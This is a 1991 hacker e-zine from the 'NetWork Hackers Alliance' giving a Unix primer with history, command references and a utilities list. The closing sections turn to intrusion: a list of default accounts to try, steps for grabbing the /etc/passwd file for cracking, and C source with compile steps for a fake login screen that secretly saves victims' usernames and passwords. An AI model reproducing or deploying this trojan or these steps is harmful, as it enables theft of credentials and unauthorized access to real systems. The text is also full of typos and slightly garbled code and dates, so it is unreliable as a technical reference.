Copy Link
Add to Bookmark
Report
NetWork Hackers Alliance 2
___ ___ ___ ___ ___________
| \ | |\ | |\ | |\ | |\
| \ | | | | | | | | | | ___ | |
| \ | | | | |_|_| | | | |\ _| | |
| \| | | | | | | |_|_| | |
| |\ | | | ___ | | | ___ | |
| | \ | | | |\ _| | | | |\ _| | |
| | |\ | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
|___| | |___| | |___| | |___| | |___| | |___| |
\___\| \___\| \___\| \___\| \___\| \___\|
- A Production of the NetWork Hacker Alliance INC -
PreZidents:Inphiniti & Code of Honor & Cobra
NHA Member Boards Listing
+=+=+=+=+=+=+=+=+=+=+=+=+
+---------------------+---------------+-------------+---------+
| Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT |
| Project Phusion | 301-365-9249 | NHA Node 1 | NoT |
| Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY|
+---------------------+---------------+-------------+---------+
NHA is now accepting applications.. If you are intrested
and knowledgable in the Hacking of Networks and Phreaking
etc, please call your fine H/p bbs system and download
'NHA-APP.TXT' and upload it to Inphiniti's Edge.
+--------------------------+
| -- NHA -- |
| NetWork Hackers Alliance |
+--------------------------+
Presents
Issue 2 : "Unix Information and Hacking"
Compiled by Inphiniti & Cobra
Edited by Inphiniti & Cobra
---
AXiS & NHA have merged as of 06/30/91 for the better of H/P in America.
---
---
Index
I. Introduction
II. History of UNIX
III. Unix Portability (other names for Unix)
IV. Frequently Used Commands (explained in detail)
V. Unix Editors (explained in detial)
VI Standard Unix Utilities
VII. UNIX Default Accounts
VIII. UNIX Password Attacker
IX. Closing Remarks
---
+-----------------+
| I. Introduction |
+-----------------+
What is an Operating System?
UNIX is a modern day operating system. But, what is an operating system?
One definition of an operating system is:
"the programs of a digital computer system which, together with the
characteristics of the computer system, form the basis of the various
operational modes of the digital computer system and especially those
which control and supervise the processing of programs."
This compact and comprehensive description assumes the understanding of
some concepts. The "digital computer system" is the hardware. These are the
physical components of the computer which can be touched. Thirty years ago
this description would have been sufficient. Today addicitonal concepts are
required. Besides the "body", a computer system must have a "soul". Since
a "soul" must be immaterial, it can only consist of software in a computer.
This software is the operating system.
Therefore, the characteristics, better yet the hardware characteristics of
the computer system, together with the operating system form the basis of the
processing capabilities. The operating system does not include all the
software in a computer. This is the software which permites the user of the
system to execute the applications software specifically written to be used
with that operating system. The user of a modern computer system is no
longer confronted by the hardware, but with the operating system such as UNIX.
From this viewpoint of the user, there are three basic operating modes
o Batch Processing
o Conversational (or interactive) mode
o Real-time processing
Batch processing originated during the time when executable programs were
read on a card reader in the form of a punched card dec, consisting of
control statements and the actual program.. The punched cards have now
disappeared - at best they can still be found as scraps for notes - but the
concept and the operating mode remains.
Batch jobs
A barch job must be defined completely and in the proper sequence. The ]
control statements are usually stored in a file. One of these statements calls
the program to be executed Several programs can be initiiated within a batch
job. However, all required operating devices such as disck storage, magnetic
tape storage, printer, plotter, etc. must be requested from inside the job.
No calls to the operating system are permitted since they are not answered.
Unix and MS-DOS,CP/M or OS/2
UNIX is the oldest of the three systems, even though it has been discussed
only in the last few yeards. CP/M and MS-DOS are oriented strongly toweds
the main features if UNIX. The newer versions of MS-DOS resemble UNIX
very much. Even the command syntax is very similar The largest step in
the direction of UNIX came with DOS Version 2.0.
Viewed from the users perspectivem the file systems of UNIX and DOS resemble
earch other alot. Both orginate in a root are structured hierarchically
(like a tree). Directories permit the user to retain an overview. Besides
the common files and directories, UNIX also knows an additional type, the
device file. Devide files provide an interface to the physical devices
which are addressed just like an ordinart file. Special systems call for
control of the peripherals and are therefore not required.
Internally a UNIX file differs from a CO/M or DOS file. The orientation
towards the record oand bloack structure of a disk has been dropped. UNIX
recoqnizes only blocks which contain byte chains. The type of file does
not make any difference to UNIX, since it is only a concern of the
application program using the file.
+---------------------+
| II. History of Unix |
+---------------------+
The history of UNIX begain in 1969 at Bell Labortatories, which is part
of AT&T. Kennth Thompson developed an operating system writtern in
DEC PDP-7 assembler code for the "Soace Travel" project. He called it
UNIX. The names was derived from the preceding operating system
Multics which was less conservative in the use of scare computer
resources. UNIX was at first a single user variant of Multics.
In 1971 UNIS was implemented again in assembler code on ther more powerful
computers of the PDP-11 series. To become more independant from another
change in hardware, Thompson planned a new implementation in a higher level
language. He developed the B language from BCPL in 1970, but this language
did not prove powerful enough.
After Dennis Ritchie, also a Bell, created the C language, UNIX was
rewritten almost completely in this higher level language by 1073. By
utilizing the advantages of C, UNIX became capable of handling multiusers
and multi-tasking. UNIX was then machine independent and the start signal
for its rapid distribution was given. At that time, Version 5 was still
being distributed to American universites free of chare for use in research
and education. Berkeley University in particular developed UNIX further.
The real triumph begain in 1975 with Version 6. AT&T granted source
licenses to intrested companies, but without support. From this
release, derivatives of UNIX were created with spilt away from the main
development.
Version 7 of UNIX appeard about the same time as the first 16-bit
microprocessors. This is the version onwhich most of todays Unix
derivatives are based. A third branch also developed, which is
characterizedmost by the Microsoft product XENIX.
Since 1983 AT&T has tried to bring the various development streams
together again. Training, documentation and other support is
being offered. The external sign is a new number series know as System
V.
+------------------------+
| III. Unix Portability |
+------------------------+
System Name Manufacturer
----------- ------------
Aix IBM
bsd University of California at Berkeley
Coherent Mark Williams Co.
Cromix Cromemco
Edition VII Perkin-Elmer
EUNIX Electronic Info Systems, INC
IDRIS Whitesmith Ltd.
IS/1 Interactive Systems, INC
IS/5 Interactive Systems, INC
JOS CRDS
MUNIX PCS
OS-1 Software Labs
SINIX Siemens
Unica Knowlogy
UTS Amdahl
UNIX Nixdorf
UX Hwelett Packard
VENIX Ventur Com Ulnc.
XENIX Microsoft Co.
ZEUS Zilog
+-------------------------------+
| IV. Frequently Used Commands |
+-------------------------------+
Name: CAL
Syntax: cal [MM] yyyy
Function: Creates calendar excerpts.
Options: None
Name: CANCEL
Syntax: cancel [reqiest-id ...] [printer ...]
Function: Print reuest made with ld or 1pr are canceled
Options: None
Name: CAT
Syntax: cat [filename]
Function: Writes the files indicated screen
Options: none
Name: CLEAR
Syntax: clear
Function: Clears the display screen.
Options: none
Name: COMM
Syntax: comm [optoms] dat1 dat2
Function: Displays the lines common to files dat1 and dat2
Options: -1 \
-2 > Suppress output of the corresponding columns/lines
-3 /
Name: CRYPT
Syntax: crypt [key]
Functions: Encodes and decodes text.
Options: None
Name: DATE
Systax: date [date, time]
Functions: Outputs date and time
Options: None
Name: DU
Syntax: du [option] [dat1] ...
Functions: Returns the disk usage or block assignment o the files.
Options: -a Block number for eache file (defult)
-s Only the total number of blocks is indicated
Name: ECHO
Syntax: echo [arguments] [\character]
Function: Output of commentary in shell procedures.
Options: System dependant.
Name: FILE
Syntax: file [options] file1 ...
Function: Attempts to determine the specified files class.
Options: Machine dependant.
Name: GREP
Syntax: grep [options] expressions [file1] ...
Function: Searched the specified files for text patterns which
where indicated.
Options: -b Include Bloack numbers
-c Count number of matching lines
-f file Searches ex[ression is in the indicated file and not
in the arguement.
-h No filename in the output line
-n Output line number in every hit line
-s No output, only status for procedures
0 = hit
1 = not hit
2 = syntax error
-v Inversion of the command
-y No distinction made between upper and lower case letters
Name: HEAD
Syntax: head [option] [file1] ...
Function: The first N lines of stdin, or the files indicated
Options: -n Indicates the numbner of lines from the beginning of the
file.
Name: LOGIN
Syntax: login NAME
Function: Logs new users on the system and removes old users.
Options: None
Name: LP
Syntax: lp [options] [file1] ...
Function: Insterts a print request ino the wait quee of the spool
system.
Options: -c Creates a temporary Copy file
-m After print output, a message is sent by mail
to the orginator
-r remove file after insertion of a temporary copy into
waiting queue
Name: LPSTAT
Syntax: lpstat [options] [request...]
Function: Provides information for the spool system, including
the current status of th print queue
Options: -u [list] oputputs the status of all print requests for
users in the list specified, each sperarated by
a comma.
Name: MORE & PG
Syntax: more [options] [file1] ...
pg [options] [file1] ...
Function: Display ready preparation of output with user controls
for ease of viewing.
Options: -l returs a disply ready list
Name: PASSWD
Syntax: passwd [user-name]
Function: Change or define a new password
Options: None
Name: PR
Syntax: pr [options] [file1] ...
Function: Prepates files for printing.
Options: -h following textis output as header.
-l[n] Lines per page
-n n column output
-n[nz] Line numbering
n = Number Size
z Dividing charaters between line numbers and content
-o[n] n charaters spaces at the left border
-p[n] After n pages, wait so that baper can be changed
-t Suppresses title, line numbers and date.
-w[n] Page width in charaters.
Name: PS
Syntax: ps [options] [process1 ...] [user1 ...]
Function: Gives status information about active processes.
Options: -a All interactive processes.
-e All process for all users.
-f Complete information list
-l long form of the information list.
-u user all process for the indicated users.
Name: SORT
syntax: sort [options] [+pos1] [-pos2] [file1] ...
Function. Sorts the lines of all files indicated according to
the ascii character set.
Options: -b Ignore blanks and tab characters at the begining
of the file.
-d Consider only alphanumeric characters and blanks.
-f Treat uppercase letters as lowercase
-r Sort in revers order.
-t [c] Dividing character c, may not be a space
Name: SPLIT
Syntax: split [-n] [file [name]]
Function: Splits the indicated file into parts of n lines each.
Option: -n Number of lines for each partial file.
Name: TAIL
Syntax: tail [n [units]] [file1 ...]
Functions: Copies the named file to stdout, beginning at the
designated postion within the file.
Options: None
Name: TIME
Syntax: time [command]
Function: Returns the execution time of a command or program with
actual delays in seconds.
Options: None
Name: WC
Syntax: wc [options] [file1] ...
Function: Counts lines, words and/or charaters in the indicated file
Options: -l counts only lines
-w counts only words
-c counts only characters
Name: WHO
syntax: who
Function: Returns information about current users, user ids, terminals
and start of session.
Options: None
+-----------------+
| V. Unix Editors |
+-----------------+
There are three basic editors in the unix environment. Some systems have
other non-portable editors but there are three basic ones.
ed:
- line oriented
- interactive
sed:
- line oriented
- not interactive
- for batch processing
vi:
- most powerful UNIX editor
- interactive
- full screen capability
-- ED Editor Command Summary --
syntax: ed [-] [-x] [file]
Commands
--------
a append
i insert
c change
w [file] write to [file]
. current line
$ last line
n Specifir line number n
+n Go ahead N lines
-n Go back N lines
d delete
e file Reads file into current file
f outputs name of processed files
j join
l list
p print
r file read and insserrs specified file behind the indicated buffer
m [line] move to line #
t [line] transfer to line #
u undo
q quit
! executes the shell command
-- SED Editor Command Summary --
Syntax: sed [-n] [-e script] [-f cmd_file] [input_file ...]
Options: -e sed command can be indicated directly
-f sed command are read from specifierd command file
-n suppresses the standard output
-- VI Editor Command Summary --
a append
i insert
o open
esc to exit insert mode
w write file
q to quit
j move down one line
k move up one line
+-----------------------------+
| VI. Standard Unix Utilities |
+-----------------------------+
(Please Note: When entering this commands in UNIX you type in lower case)
ACCEPT Permits spooling request for printer
ADB Absolute debugger
AR Maintains portable archives and libaries
AS Assembler
AT Executes commands at a later time
AWK Pattern scanning and processing language
BANNER Makes text banners
BASENAME Outputs filename from path name
BATCH Executes commands at a later time
BC Desktop calculator with programming constuctions
BDIFF Compares two large files
BFS Big file scanner
CAL Outputs a Calander
CALENDAR Appointment scheduler
CANCEL Cancels previous spool requests
CAT COncatenates and prints files
CC C Language compiler
CD Changed current work directory
CHGRP Changes group ownership of file or directory
CHMOD Changes file access permission
CHOWN Changes file ownership
CMP Compares two files
COL Filters revers line feeds
COMM Selects or rejects lines common to two sorted files
CP Copies files
COIP Copies files archives in and out
CPP C language preprocessor
CRYPT Encodes and Decodes text
CSPLIT Splits files based on pattern matching
CT Spawns a getty process to a remote terminal
CTRACE Traces C program execution
CU Calls another UNIX system
CUT Cuts out selected fields of each line of a file
CREF Generates C program cross-reference listing
DATE Sets or prints the current date
DC Desktop calculator
DD Performs file trasnformations
DEROFF Removes formatting commands from file
DF Displays free space in file system
DIFF Compares two files
DIFF3 Compares three files
DIRCMP Compares directories
DIRNAME Outputs the path from a path name
DIS Object file disassembler
DISABLE Disables spooling on printer
DU Summarizes Disk usage
ECHO Echoes arguments
ED Line-oriented editor
EDIT Line-oriented editor
ENABLE Enables spooling on a printer
ENV Sets environment for command execution
EXPR Evaluates arguments as an expression
FACTOR Obtains prime factors of a number
FGREP Searchs a file for a character string
FILE Determines file type
FIND Searches for files
FSDB Debugs damaged file systems
GED Graphical Editor
GETOPTS Phrase command line options
GLOSSARY Displays definitions of UNIX system terms and symbols
GRAPH Draws a graph
GRAPHICS Accesses graphical and numerical commands
GREEK Selects terminal filter
GREP Selects lines of a file based on a pattern matching
GUTIL Graphical utilties
HELP Provides on-line help on UNIX commands
HELPADM Makes changes to the Help Facility Database
ID Outputs user and group ID's and names
IPCS Reports interprocess communication ffacilities status
JOIN Joins two tabular data files
KILL Terminates or signals a process
LINE Copies a line from standard input to output
LN Links file names
LOGIN Admits autorized users to system
LOGNAME Outputs the user's login name
LP Line printer spooler
LPR Line printer spooler
LPADMIN Configes the 1p spooling system
LPSTAT Printer spooling status information
LS Lists contents of directories
M4 Macro processor
MAIL Sends and recieves UNIX mail
MAILX Extended Mail Facility
MAKE Regenerates groups of programs
MAKEKEY Regenerates encryption key
MAN Prints on-line manual entries
MESG Permits or denies messages
MKDIR Makes a Directory
MKFS Creates a file system on disk
MKNOD Creates a directory entry for a special file
MOUNT Mounts a file system
MV Moves files
MVDIR Moves a directory
NEWFORM Reformats lines of a text file
NEWGRP Changes active group membership
NEWS Prints News commands
NICE Runs a program at reduced priority
NL Line numbering filter
NOHUP Runs a command immune from hang-ups and quits
NROFF Text formatter
OD Outputs an octal dump of a file
PACK Packs files
PASSWD Changes online users password
PASTE Merge lines of files
PCAT Concatenates packed files
PG Browse file contents on terminal screen
PR Print files
PS Outputs process status
PWD Prints the name of the current working directory
RM Removes files
RMDIR Removes directories
RSH Restricted UNIX system shell
SAG Outputs system activity graph
SAR Outputs system activity report
SCAT Concatenates and prints files
SDB Symbolic debugger
SDIFF Compares two files
SED Stream Editor
SH The Unix system shell
SHL Shell layer manager
SHUTDOWN Shuts down the system
SLEEP Suppends execution for a time interval
SORT Sorts and merges files
SPLIT Splits a file
STARTER Displays UNIX information for new users
STRIP Removres symbol table information from object file
STTY Sets ternubak characterustics
SU Tempararily changes the user-ID
SUM Outputs checksum and block count for file
SYNC Writes disk buffers to disk
SYSADM Menu Driven system administration utility
TABS Srets tabs on a terminal
TAIL Outputs the last oart of a file
TAR Tape file archiver
TEE Pipe fitter
TEST Evaluates conditions
TIME Times command execution
TOUCH Updates access and modifications times of a file
TR Character translation fiflter
TROFF Phototypesetter text formatter
TRUE Returns true value
TTY Outputs name of a terminal
UNMASK Setsr file creation mode mask
UMOUNT Dismounts a file system
UNAME Outputs the name of the current UNIX system
UNIQ Outputs a file with unique lines
UNITS Performs units conversions
UNPACK Unpacks packed files
USAGE Displays information about command usage
UUCP Copies files between UNIX systems
UULOG Outputs UUCP log information
UUNAME Outputs UUCP names of known systems
UUSTAT Outputs UUCP status information
UUX Executes a command on a remote UNIX system
VI Full screen editor
WAIT Waites for completeion of background processing
WALL Sends a message to all users
WC Outputs line, word and character counts for files
WHO Outpurts information on current users
WRITE Sends messages to another user
XARGS Constructs an argument list and executes a command
YACC Compiler-generating tool
+----------------------------+
| VII. Unix Defualt Accounts |
+----------------------------+
Super User Default Accounts
ROOT
MAKESYST
MOUNTSYS
UMUNTFSYS
CHECKSYS
FSYS
Regular User Defaults
DAEMON
DAEMONx (x value is 1 thru 9)
LP
Unix Systems that have already been hacked try..
ROCUSER
IEx (x value is 1 thru 4)
ANONYMOUS
GUEST
If it askes for a password I doubt you will get in but always try the
account name.
Once in type this (at the waiting prompt usually a # or $)
cd /ETC (UNIX root directory)
cat PASSWD (UNIX password file) <--- Capture this if you can get it
then find a UNIX hacker on your local H/P board and let it run!
+------------------------------+
| VIII. Unix Password Attacker |
+------------------------------+
/* this is what a 'C' comment looks like. You can leave them out. */
/* #define's are like macros you can use for configuration. */
#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
/* The above string should be made to look like the message that your
* system prints when ready. Each \n represents a carriage return.
*/
#define LOGIN "login: "
/* The above is the login prompt. You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/
#define PASSWORD "password:"
/* The above is the password prompt. You shouldn't have to change
* it, either.
*/
#define WAIT 2
/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect." Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/
#define INCORRECT "Login incorrect.\n"
/* Change the above so it is what your system says when an incorrect
* login is given. You shouldn't have to change it.
*/
#define FILENAME "stuff"
/* FILENAME is the name of the file that the hacked passwords will
* be put into automatically. 'stuff' is a perfectly good name.
*/
/* Don't change the rest of the program unless there is a need to
* and you know 'C'.
*/
#include <curses.h>
#include <signal.h>
int stop();
main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#}
printf(INCORRECT);
endwin();
}
stop()
{
endwin();
exit(0);
}
-- END --
** this is how you compile it
cc horse.c -lcurses -ltermcap
mv a.out horse
source trap (again, don't type the %)
+---------------------+
| IX. Closing Remarks |
+---------------------+
Well this is the end of Unix Hacking Volume I. You should have a firm
awareness with UNIX now and I hope you continue to grow and wait for
our UNIX Hacking Voulume II which will contains holes into the unix
system..
NHA nor the Author(s) of this file are responisble for any use that
may come into play by the reader. This is meant for education purposes
only not for any illegal activities.
___ ___ ___ ___ ___________
| \ | |\ | |\ | |\ | |\
| \ | | | | | | | | | | ___ | |
| \ | | | | |_|_| | | | |\ _| | |
| \| | | | | | | |_|_| | |
| |\ | | | ___ | | | ___ | |
| | \ | | | |\ _| | | | |\ _| | |
| | |\ | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
|___| | |___| | |___| | |___| | |___| | |___| |
\___\| \___\| \___\| \___\| \___\| \___\|
- A Production of the NetWork Hacker Alliance INC -
PreZidents:Inphiniti & Code of Honor & Cobra
NHA Member Boards Listing
+=+=+=+=+=+=+=+=+=+=+=+=+
+---------------------+---------------+-------------+---------+
| Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT |
| Project Phusion | 301-365-9249 | NHA Node 1 | NoT |
| Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY|
+---------------------+---------------+-------------+---------+
NHA is now accepting applications.. If you are intrested
and knowledgable in the Hacking of Networks and Phreaking
etc, please call your fine H/p bbs system and download
'NHA-APP.TXT' and upload it to Inphiniti's Edge.
With this file we welcome Keener into NHA.
N.H.A. The Future of Hacking and Phreaking
In the works....
CBI Advanced Usage
TRW Advanced Usage
Milton.Edu Advanced Usage
more to come from N.H.A.